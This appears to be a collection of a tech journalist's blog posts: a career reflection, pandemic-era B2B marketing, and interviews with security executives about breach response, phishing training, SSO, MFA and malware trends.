Should every coder become a manager?

Too often in tech I see this where stellar coders (and other technical types) reach the point where they are offered a job as a manager. Do they take the promotion and get the corresponding raise in pay and responsibility? Or stay put and continue to write code? The choice isn’t an easy one.

My first big promotion came in my mid-30s, when I was working at PC Week. I had made the move to tech journalism from working in various IT departments, and I was given the chance to run about a third of the magazine’s editorial operations. The promotion required a move from LA to Boston. I can tell you the exact date by a photo of a cake that was baked in my honor by the IT department at Coke Foods, which I happened to be visiting that week. The cake was a copy of a typical front page of the publication. (Sorry about the photos, I had no idea that I was taking them for posterity.)

This promotion was exactly right for me — I went on to run other tech pubs (Network Computing, Tom’s Hardware, various EETimes sister websites, and Inside Security) and work with dozens of editors, artists, and other creative types.

But I came across a more typical situation where the promotion brings about more trouble than success. I was listening to this podcast between Avast CISO Jaya Baloo and Troy Hunt. Hunt has run the site Have I Been Pwned for several years, largely through his own interest in exposing the weaknesses with data breaches. (Note: I have worked with Baloo and write numerous blog posts for Avast.) He mentions how the site got its start when he was promoted to engineering manager at Pfizer and was miserable, because it took him out of the day-to-day coding challenge. While he was getting more influence within the organization, he was also missing out on the joys of coding and building something significant. His dissatisfaction was a good thing for all of us because he has done a bang-up job running HIBP, as it is known. (For those of you unfamiliar with hacker lingo, “pwned” is what hackers do when they succeed at compromising your credentials and break into your system.)

The podcast covers other topics besides Hunt’s promotion. It is worth listening to because it shows the nuanced approach that Hunt has towards running such an influential site, and how he has to play dodge-the-lawyer when he tries to get confirmation that a breach has actually occurred. Still, this is a reminder that not all promotions are always the best directions for our careers. I wish I could send him a cake in appreciation!

Marketing in the time of the Covid

I have been doing a couple of podcast interviews with marketing executives over the past couple of weeks: one with Domo (a cloud BI company that I did hands-on tests several years ago) and Talend (a cloud data integration vendor). Both faced big challenges during the pandemic, such as turning their in-person user conferences into all virtual ones and changing their marketing to adjust to the new virtual way of doing business. You would think that the marketing would be pretty much the same even though both companies operate primarily in the cloud. But you would be wrong. When it comes to enterprise B2B software sales, you need road warriors and a personal high-touch. But the old school days of customer wine-and-dine are gone. You have to be more creative about building those connections these days.

Talend hired a completely new leadership team (which interestingly are all women) and as a result went through a series of rebranding efforts. “Data is the difference between surviving and thriving,” says Lauren Vaccarello, the CMO of Talend on our podcast. She watched one of her favorite tea shops close their doors in a couple of weeks and lay off hundreds of their staff. That motivated her to rethink their messaging and start fresh, assuming that everything will change. “We have a product that can help businesses with better and real-time access to their data.”

“We can’t rely on anything, we have to innovate and change what we did a year ago,” she said. For example, they could pull customer executives together in a webinar rather than rely on those who could attend a physical meeting. Not to mention that virtual events were a lot less costly and had a lot higher attendance and engagement too. “From an ROI perspective, we got 5x higher returns than from an in-person event.” Having an all-female executive team at Talend is an interesting experience for all of them. “None of us feel the need to be perfect around each other,” she said. That makes for more intense, authentic and productive collaboration too. “The dynamic is different.”

Domo had a similar experience and just a few days to transform their customer event into a virtual one. It went from about 3,000 attendees to more than 12,000 virtual visitors. And from three days’ worth of sessions to one 90 minute plenary session with dozens of break-out sessions that could be streamed on demand.

One of my biggest beefs with SaaS companies is how hard it is to price their services. Compare Domo’s pricing page with Talend’s  (shown here) — the latter is very transparent and very clear, and a rarity.

I want to bring in a post from Salesforce which talks about ways marketers can fight digital fatigue. The authors cite the average person now spends 7.5 hours daily in front of a screen. They have several suggestions on how to beef up your own marketing efforts during these pandemic times, including:

  • Follow your customers as they change usage patterns and try new products. Stay top of mind and evolve with them. Don’t stop your marketing efforts.
  • Personalization is critical. As customers curate their digital experiences, make sure you have a better understanding of their needs and what matters to them. But don’t cross over into being creepy.
  • Agile is here to stay. Understand this evolution and how customers are responding to your content.
  • Social media matters. Make sure you can engage your customers on the various social platforms where they talk about your products.
  • Empathy is important. Show your customers that you care and respond to their concerns. Above all else, avoid the hard sell and be authentic.


HPE blog: CISO faces breach on first day on the job

Avast CISO’s Jaya Baloo has many lessons learned from her years as a security manager, including how to place people above systems, create a solid infrastructure plan, and best ways to fight the bad guys.

Most IT managers are familiar with the notion of a zero-day exploit or finding a new piece of malware or threat. But what is worse is not knowing when your company has been hacked for several months. That was the situation facing Jaya Baloo when she left her job as the corporate information security officer (CISO) for the Dutch mobile operator KPN and moved to Prague-based Avast. She literally walked into her first day on the job having to deal with a breach that had been discovered months ago.

Baloo had several reasons why she first started talking about working for Avast, which makes a variety of anti-malware and VPN tools and has been in business for more than three decades. “When I interviewed with their senior management, I thought that we were very compatible, and I thought that I totally fit in with their culture.” She liked that Avast had a global customer reach and that she would be working for a security company.

But after she accepted her job offer, the IT staff found evidence in late September that their environment had been penetrated since May. The evidence pointed to a compromised credential for their internal VPN. Baloo’s first day at Avast was October 1, and in the first three weeks she had numerous fires to put out. She never thought making the move to Avast was going to be a challenge. “Before I got there, I thought the biggest downside was that it was going to get boring. I thought this job was going to be a piece of cake.”

Fat chance of that. During those first weeks she quickly realized that she had to solve several problems. First was to figure out what happened with the intrusion and what damage was done. As part of this investigation, she had to go back in time six months and examine every product update that was sent out to ensure that Avast’s customers weren’t infected. This also led to understand what parts of their software supply chain were compromised. These things weren’t easy and took time to track down. They were hampered by having logs that weren’t complete or misleading. Evidence also had been inadvertently deleted.

Second was to build up trust in her staff. During her interviews, Baloo was very hopeful. “I felt that I didn’t have to sell them on the need for security, since that was their focus and their main business. I thought that they would be a source of security excellence.” To her surprise, she found out that they were a typical software company, “with silos and tribes and different loyalties just like everyone else.” As she began working there, she also had to climb a big learning curve. “I didn’t know who to believe and who had the right information or who was just being a strong communicator,” she told me. The problem was not that Avast staffers were deliberately lying to her, but that it took time to get perspective on the breach details and to understand the ground truth of what happened during and after the breach. Some stories were harder to elicit because staffers weren’t used to her methods.

Finally, she had to develop a game plan to restore order and confidence, and to ensure that the breach was fully contained. She made several decisions to revoke and re-issue certificates, to send out new product updates and to begin the process to completely overhaul the company’s network and protective measures. Twenty days into the job, she posted a public update that described these steps.

In my conversations with Baloo, I realized that she had developed a series of tenets from her previous jobs as a security manager. I call them Jaya’s CISO Gems.

  1. You have to continuously doubt yourself. First and foremost, avoid complacency and be paranoid about your own capabilities. “You need to have a plan for widening your own field of view, security knowledge and perspective. You have to include more potential threats and need to challenge yourself daily. If you don’t, everything is going to look normal.” Baloo told me that many security staffers have a tendency to pay more attention to their systems, and if a system isn’t complaining or issuing alerts, then the staff thinks all is well. This complacency can be dangerous, because “you tend to hunt for things that you expect and that means you are only going to find things you are looking for.” Part of the issue is that you have to be on the lookout for the unexpected and push the envelope and have a plan for improving your own security knowledge and skills.
  2. Trust people before systems. “We have a lot of faith invested in our systems, but not necessarily in our people. That is the reverse of what it should be. We tend to focus in our comfort zone, and our zone is in tech and metrics.” But a CISO needs to listen to her team. “I like a team that can tell you when you are wrong, because that is how you learn and grow in the job and have a culture that you promote too. And above all to do it with a sense of humor.”
  3. Build a functional SOC, not just a stage set. “A SOC should support your people, not have ten thousand screens that are pretty to look at but that really say nothing. The utility of a SOC is to able to provide the subtle clues that something is wrong with your infrastructure. As an example, you may still have firewall rules that allow for malware to enter your network.” Whether you have your own SOC or outsource it, its capabilities should match what is going on across your network.
  4. Everything in your infrastructure is suspect. Trust nothing and scan everything. She suggests starting with monitoring your oldest gear first, which is what Avast did after they found the breach. “Stop making excuses for this older equipment and make sure you don’t take away the possibility that you need to fix something old. You can’t be afraid of scanning something because this aging system might go down. Do pen testing for real.” Part of a good monitoring program is to do it periodically by default, and make sure that all staff know what the IT department is monitoring. “The goal isn’t big brother style monitoring but to find oddball user behavior and to make it visible. With cybersecurity, prayer is not an option.”
  5. Do your own phishing awareness training and do it often. While there are any number of awareness vendors that can help set up a solid program, the best situation is to craft your own. “You know your own environment best and it isn’t hard to create believable emails that can be used as a learning moment with those users who end up clicking on the bait. Phishing awareness training is really a people problem and very hard to get significant improvement, because all it takes is one person to click on something malicious. We were always successful at getting people to click. For example, we sent out one email that said we were changing the corporate policy on free coffee and tea and had users enter their credentials for a survey.” Part of rolling your own awareness program is being up on the latest email authentication protocols such as DMARC, DKIM and SPF so you can have confidence in your controls.
  6. Make sure you set the appropriate level of security awareness for every specific job role. “You don’t want your entire company knowing everything about your complete security policy, just what is needed for them to do their jobs,” she said. “And we should tell them how to do their jobs properly and not focus on what they are doing wrong, too.” As an example, she cites that the customer care department should understand the best practices on how to handle customer data.
  7. CISOs should be as technical as possible. “I see a lot of CISOs that come from a higher-level risk management background and don’t take the time or have the skills to understand the details how their security technology works. You shouldn’t be afraid to dive deeper.” She also sees CISOs that come from a regulatory background. Some of the biggest attacks, such as Target, were compliant with regulations at the time. Compliance (such as with satisfying GDPR) has turned into a paper exercise rather than checking firewall rules or doing more technical checks. Instead, you get caught up in producing “compliance porn that gets sent to the board and then you get pwned. Stuff gets lost in translation to management, and you need this technical background.”
  8. Prioritize your risk intelligence. You have to know what to act on first, it is all about triage. “You fix someone with a heart attack before fixing a broken bone,” she says. This means matching risk with relevance, as I mention in my blog post for RSA here. Part of this is doing a level of sanity checking with other organizations to see what they have included in their risk profiles. Don’t do the easy stuff first just because it is easy.
  9. Don’t panic and destroy evidence. As Baloo found out during her response to their own attack, you need to understand that an infected PC can be useful in understanding your response. “Every member of the enterprise needs to be part of your response,” she says. Part of this is being trained in how to preserve evidence properly.
  10. Start with open source security tools first. “I am not a fan of building custom security software unless nothing like it exists on the market and it is absolutely necessary. And if you write your own tools, go the open source route and embrace it entirely: build it, make it available with peer review and let someone else kick it. I have seen too many custom systems that never get updated.”

Brian NeSmith, providing SOC-as-a-Service with Arctic Wolf Networks

Brian NeSmith is the CEO of Arctic Wolf Networks, which was started back in 2012.  They provide Security Operations Center-as-a-Service. I have known him for decades when he started a quirky company called Cacheflow that eventually became part of Blue Coat where he was also CEO. I asked him a few questions.

Q: What has changed in enterprise infosec compared to when you first started at AWN six years ago?

Back when we started the company breaches were smaller with little lasting damage.  The stakes are much higher profile now. We started the company before Target, Equifax and Petya, major attacks that put cybersecurity on the evening news. Nowadays cybersecurity is a boardroom topic, and a company’s brand and business are affected by how good their security is.

Q: How does a SOC-as a S differ from just a MSP who sells managed SOC services?

SOC-as-a-service provides experienced security analysts doing real security work.  MSPs selling managed SOC services are usually just managing the infrastructure or forwarding alerts, but they are not doing the actual security work. The pressing issue in our industry today is how we detect and respond to threats and not just managing the infrastructure more cost effectively.  SOC-as-a-service provides that, and managed SOC services from an MSP does not.

Q: What portion of the resources you monitor are on premises vs. cloud of your current customers? How has that changed from six years ago?

The portion of cloud resources we monitor has been steadily increasing over the past six years.  But the largest resource we monitor in most companies is still the employees and their endpoints.  Many people view people as the weakest link in the chain, and we find that still to be the case.  Most security incidents are still due to some sort of human error or mistake even when they have the best security products in place.

Q: You ran Blue Coat through some very turbulent times, when it was first called CacheFlow. How have web apps changed from those early days and will enterprises ever feel secure deploying them?

It is a completely different world today than when I first started leading CacheFlow.  There is not a company out there that does not rely on a web app to operate or serve their customers.  If they have not, companies do not have a choice but to embrace web apps, so they need to figure out what is needed to feel secure deploying them.

Q: Is ransomware or fileless malware more of a threat today from your POV?

I don’t think they are any more of a threat than other types of malware.  Ransomware is different in that it can literally bring your business to a halt.  That is very different from traditional malware.  When it comes to fileless malware, the increased danger comes from how openly information is on how to exploit these.  We have seen malware become commercialized so you can literally purchase the malware you want to use and even get technical support.  This means that anyone can become a hacker, and it will result in more attacks.

Interview with Yassir Abousselham, Okta CSO

Yassir AbousselhamI spoke to Yassir Abousselham, the CSO for Okta, an identity management cloud security vendor. Before joining Okta this past summer, he worked for SoFi, a fintech company where he built the company’s information security and privacy program. He also held leadership positions at Google, where he built both the corporate security for finance and legal departments and the payments infrastructure security programs, as well as at Ernst & Young, where he held a variety of technical and consultancy roles during his 11-year tenure.

When first started at E&Y, he worked for an entertainment company that hired them to examine their security issues. He found a misconfigured web server that enabled them to enter their network and compromise systems within the first 30 minutes of testing. This got him started in finding security gaps and when he first realized that security is only as good as your weakest link. “The larger the environment and more IT infrastructure, the harder it is to maintain these systems.” Luckily they weren’t billing by the hour for that engagement! He went on to produce a very comprehensive look at the company’s security profile, which is what they needed to avoid situations like what he initially found.

“The worse case is when companies do what I call check mark compliance assessments,” he said, referring to when companies are just implementing security and not really looking closely at what they are doing. “On the other hand, there are a few companies who do take the time to find the right expertise to actually improve their security posture.”

“To be effective, you have to design many security layers and use multiple tools to protect against any threats these days. And you know, the tools and the exploits do change over time. A few years ago, no one heard about ransomware for example.” He recommends looking at security tools that can help automate various processes, to ensure that they are done properly, such as automated patching and automated application testing.

Although he has been at Okta only a few months, they have yet to experience any ransomware attack. “The first line of defense is educating our employees. No matter how much you do, there is always going to be one user that will open an phished attachment. Hackers will go through great lengths to socially engineer those users.” Okta employs a core security team that has multiple functions, and works closely with other departments that are closer to the actual products to keep things secure. They also make use of their own mobile management tool to secure their employees’ mobile devices. “We allow BYOD but before you can connect to our network, your device has to pass a series of checks, such as not being rooted and having a PIN lock enabled and running the most updated OS version,” he said.

How does securing the Google infrastructure compare to Okta? “They have a much more complex environment, for sure.” That’s an understatement.

Working for an identity vendor like Okta, “I was surprised that single sign-on or SSO is not more universally deployed,” he said. “Many people see the value of SSO but sometimes take more time to actually get to the point where they actually use this technology. Nevertheless, SSO and multi-factor authentication are really becoming must-have technologies these days, just like having a firewall was back 20 years ago. It makes sense from a security standpoint and it makes sense from an economics standpoint too. You have to automate access controls and harden passwords, as well as be able to monitor how accounts are being used and be able to witness account compromises.” He compares not having SSO to putting a telnet server on the public Internet back in the day. “It is only a matter of time before your company will be compromised. Passwords aren’t enough to protect access these days.”

How the Okada Manila Luxury Resort Built its Greenfield IT Infrastructure

When you hear about an IT staff that has to build their infrastructure from scratch to support a new business, you think, “That couldn’t be that hard – they had no legacy infrastructure to support. What a dream job.” Well, it wasn’t a piece of cake for the crew at the Okada Manila resort hotel, and in an interview with Dries Scott, the SVP of IT for Okada, I got to see why.

Okada was built on a huge site and is similar to the resort-style properties that can be found in Las Vegas and Macau. It will house 2,300 guest rooms when it is fully built and have 10,000 employees. Scott’s IT department has at least 100 of them full-time — plus contractors — to support 2,000 endpoints and numerous physical and virtual servers placed in two separate datacenters on the property.

Scott actually worked for a few of the Macau resort hotels before coming to Manila, and he wanted to create the ideal IT environment for a five-star luxury hotel. “The biggest decision we had to make was to try to steer clear of having actual desktop PCs as our workstations,” he said to me when he sat down for an interview yesterday. “When you are starting from a clean sheet of paper, you want something that could last 10 to 20 years and want products that could evolve over this time period.” He decided to choose VDI for his endpoints. “I wanted to move away from the usual desktop PC environment, although we ending up having a few of them for our staff. PCs are a pain to manage, because hard drives crash, getting updates and patches distributed isn’t easy, and other issues.” To support their VDI deployment they purchased a variety of products, including XenDesktop, XenApp and NetScaler, HP thin clients and Dell servers.

One of the key enabling technologies is FSLogix Office 365 Container.  “This makes Outlook running on XenApp and XenDesktop able to mount users’ profiles as if they were on a local C: drive, so Windows acts normally and Outlook works like it is running on a regular PC desktop,” he said. This means you get the performance of the virtual workspace but the ease of management too.

Having a VDI solution meant some initial support hurdles. “We had to have a lot of patience with our users, some of whom were using VDI workstations for the first time,” he told me. “I could have taken the easy way out and just bought desktops for everyone, but I knew eventually VDI will pay off and benefit us in the long run.”

One concern Scott had was keeping corporate data secure. Given the market of his resort, he wanted to ensure that customers’ information stayed on the corporate systems; “It is one of our most critical assets,” he said. “Users don’t have the ability to remove any corporate data from the company.” His thin clients locked out USB access, for example, and he also set up appropriate data leak policies too. Through ShareFile, he has other policies for how files can be shared across his staff, and he prevents access to public SaaS repositories, like consumer file-sharing services whenever possible. Finally, he figured out ways to keep data from his construction contractors on his servers. “I didn’t want them to pack up their PCs and leave with my data on them,” he said.

View post on

Building a new resort’s IT infrastructure wasn’t as easy as I was assuming, mainly because some IT elements needed to be put in place during the construction phase to support those workers on the job site. This meant erecting temporary buildings and networks and then migrating these resources to the production environment once the hotel was built. “That migration wasn’t easy, but we are just about through that process,” he said. “We have certainly been through a bit of a bumpy road.” One of his recommendations was to use Citrix consulting services in setting up his environment and helping define the appropriate computing architecture. “They can help make everything stable from the beginning and figure out your app and server configurations.”

What helped him pull off this project? Executive buy-in. “Our chairman is an engineer and very much into technology. It was a massive help that he supported our decisions from day one. All he wanted was to implement my vision and he gave me the ability to implement it.”

Thoughts on cybersecurity from Krishnan Chellakarai at Gilead Sciences

I spoke to Krishnan Chellakarai about his thoughts. He is currently the Director, IT Security & Privacy at Gilead Sciences and has been a security manager at several biotech firms in the past. One thing he is concerned about is the increasing threats from IoT. He gave me a theoretical example. “What happens if you are reading your emails on your Apple Watch and you click on a phished link. This could lead to a hacker gaining access to credentials and use this information to stealing information from your network.” As users bring in more Fitbits and other devices with Internet access to corporations, “every company needs to worry about this threat vector because it is a foot in the door.” This is part of a bigger trend, where “we have less data stored on individual devices, but there is more access” across the corporation. What this means is that there is “less visibility for IT security pros in case of an exploit.”

Certainly, some of the responsibility with keeping a firm’s infrastructure secure has to lie with each individual user. Chellakarai asks if “people ever look at their Gmail last account activity in the right bottom corner?” Or do we ever click on the security link that pops up when you are signed in to your account from multiple places? This is food for thought. “IT managers need to put some common sense controls in place so they can have better network visibility,” he says. Another example: when was the last time anyone checked their printer firmware or other legacy devices to ensure that they have brought up to their latest versions. “It is time to stop thinking of security after an app is built, and start thinking about security from the beginning, when you are planning your architecture and building your apps.”

Chellakarai says, “One of my first things when I start working for a new company is to do a data analysis and network baseline, so that I can understand what is going on across my infrastructure. It is so critical to do this, and especially when you join a company. I look at policies that aren’t being enforced and other loopholes too. Then I can prioritize and focus on the risks that I find.”

Lenny Zeltser is teaching us how malware operates

Lenny Zeltser has been teaching security classes at SANS for more than 15 years now and has earned the prestigious GIAC Security Expert professional designation. He is not some empty suit but a hands-on guy who developed the Linux toolkit REMnux that is used by malware analysts throughout the world. He is frequently quoted in the security trades and recently became VP of Products of Minerva Labs and spoke to me about his approach to understanding incident response, endpoint protection and digital forensics.

“I can’t think about malware in the abstract,” he said. “I have to understand it in terms of its physical reality, such as how it injects code into a running process and uses a command and control network. This means I have to play with it to learn about it.”

“Malware has become more elaborate over the past decade,” he said. “It takes more effort to examine it now. Which is interesting, because at its core it hasn’t changed that much. Back a decade or so, bots were using IRC as their command and control channel. Now of course there is much more HTTP/HTTPS-based connections.”

One interesting trend is that “malware is becoming more defensive, as a way to protect itself from analysis and automated tools such as sandboxes. This makes sense because malware authors want to derive as much value as they can and try to hide from discovery. If a piece of malware sees that it is running or a test machine or inside a VM, it will just shut down or go to sleep.”

Why has he made the recent move to working for a security vendor? “One reason is because I want to use the current characteristics of malware to make better protective products,” he said. Minerva is working on products that try to trick malware into thinking that they are running in sandboxes when they are sitting on user’s PCs, as a way to shut down the infection. Clever. “Adversaries are so creative these days. So two can play that game!”

Another current trend for malware is what is called “fileless,” or the ability to store as little as possible in the endpoint’s file system. While the name is somewhat misleading – you still need something stored on the target, whether it be a shortcut or a registry key – the idea is to have minimal and less obvious markers that your PC has been infected. “Something ultimately has to touch the file system and has to survive a reboot. That is what we look for.”

Still, no matter how sophisticated a piece of malware is, there is always user error that you can’t completely eliminate. “I still see insiders who inadvertently let malware loose – maybe they click on an email attachment or they let macros run from a Word document. Ultimately, someone is going to try to run malicious code someplace, they will get it to where they want to.”

“People realize that threats are getting more sophisticated, but enterprises need more expertise too, and so we need to train people in these new skills,” he said. One challenge is being able to map out a plan post-infection. “What tasks do you perform first? Do you need to re-image an infected system? You need to see what the malware is doing, and where it has been across your network, before you can mitigate it and respond effectively,” he said. “It is more than just simple notification that you have been hit.”

I asked him to share one of his early missteps with me, and he mentioned when he worked for a startup tech company that was building web-based software. The firm wanted to make sure their systems were secure, and paid a third-party security vendor to build a very elegant and complex series of protective measures. “It was really beautiful, with all sorts of built-in redundancies. The only trouble was we designed it too well, and it ended up costing us an arm and a leg. We ended up overspending to the point where our company ran out of money. So it is great to have all these layers of protection, but you have to consider what you can afford and the business impact and your ultimate budget.”

Finally, we spoke about the progression of technology and how IT and security professionals are often unsure when it comes to the shock of the new. “First there was vLANs,” he said. “Initially, they were designed to optimize network performance and reduce broadcast domains. And they were initially resisted by security professionals, but over time they were accepted and used for security purposes. The same thing initially happened with VMs and cloud technologies. And we are starting to see containers become more accepted as security professionals get used to them. The trick is to stay current and make sure the tools are advancing with the technology.”

The view from Joshua Belk, former FBI CSO

Joshua Belk is the co-founder of the security startup Opsec360. Previously, he was the cybersecurity manager at the electric utility PG&E and the CSO for the FBI back at the beginning of this decade.

His earliest memory of a security issue was with managing people: “I have found that no matter how comprehensive our policies may be, if you don’t have the right culture among your workforce they won’t matter. Education, understanding, and inclusion are the ways to build the right security environment.”

He is drawn to tools that provide useful analytics. “With TB of data available to your team, trying to find the needle in the haystack can be a challenge. Each tool has its place in your security architecture so picking one is difficult, but those which are capable of providing me good information for analysis are the ones I prefer. That said, knowing your use cases and setting up your tools is probably the biggest impact to any security organization.”

His best advice for dealing with insider threats is to first, start with the basics. “Many companies have not taken adequate measures to protect their information or environments. At the lowest level, access provisioning, data classification, and updated antivirus and firewalls are all mandatory but when new systems or services get introduced into your environment the effects are often not well known. Protect against the drift.”

He sees MDM as a careful balance between protecting the employee and preventing unauthorized access. “At the core of the issue, no one wants their data put at risk and most users and organizations are willing to conform to a good policy in order to protect themselves.”


Like what you are reading?

Subscribe to Inside Security!

Interview with IT Manager Paul Lanzi

Paul Lanzi is the COO and co-founder of Remediant, an IT security startup that has created a product to protect privileged accounts. Prior to this startup, he worked for many years as an IT manager in the biotech field, managing various engineering teams for Genetech and then Roche.

Back 11 years ago when he started at Genentech, the first security problem he helped tackle was dealing with managing multiple accounts. “Everyone had multiple accounts and multiple passwords, and we built our own home-grown system to consolidate these accounts, and make it easier for everyone to use a single username and password to get all of their work done. That actually improved security, since lessened the chance that someone would have to write down their multiple passwords somewhere — but it also made it easier to ensure that every employee had the right access to do their job.”

Of course, today we have both single sign-on products to federate identities, such as Okta and Ping Identity, and identity governance products such as Sailpoint and RSA Archer. But back then this was hard work.

Lanzi’s best security tool has been multi-factor authentication. “I turn it on wherever I can, it is truly one of the most under-appreciated tools around. While it isn’t perfect, this technology sits in that rare sweet spot between simplicity and security,” he said. In his present firm he uses a combination of Google Authenticator and Yubikey Nano devices for this purpose. “I am amazed at how much crypto they can cram into that Nano form factor,” he said, which is about the size of thumbnail (shown here).

A decade or so ago, Lanzi was involved in rolling out 110,000 iPads globally at Genentech/Roche. “At the time, it was the largest non-education deployment of iPads in the world, and we used the MobileIron’s MDM software to protect both our data at rest and in flight. Their MDM-based security capabilities gave us the ability to remotely wipe the fewer than 20 devices that were lost or misplaced each month. Its combined capabilities gave us assurance that when those devices were lost, the data on them was still secure. We could also enforce minimum OS version standards, to ensure that users were keeping them up to date with OS security updates.”

Genentech/Roche had a very unusual security staff, composed of folks from different departments. “We had separate teams for patching desktops, maintaining our network infrastructure, an IT Security policy writing group, an account provisioning engineering group for maintaining that piece, and an overall Security Architect as well. They contributed to an overall defense in depth because they were mutually supportive and worked together. That isn’t going to be possible in every enterprise, but we had terrific coverage across the various skills and potential threats areas. And given that we had personnel split across South San Francisco, Madrid and Basil, Switzerland, it was pretty impressive.”

How has security changed among his various employers over the years? “It really depends on the level of support at the executive level. At Genentech/Roche, we had executives who understood the risks and the investment needed to minimize the security risks. Other places were behind the curve and more focused on creating policies and lagged with their investment in security infrastructure. Part of the issue is that unlike in the retail or government sectors, biotech hasn’t had the big-news breaches to motivate organizations towards security improvements.”

Like what you are reading?

Subscribe to Inside Security!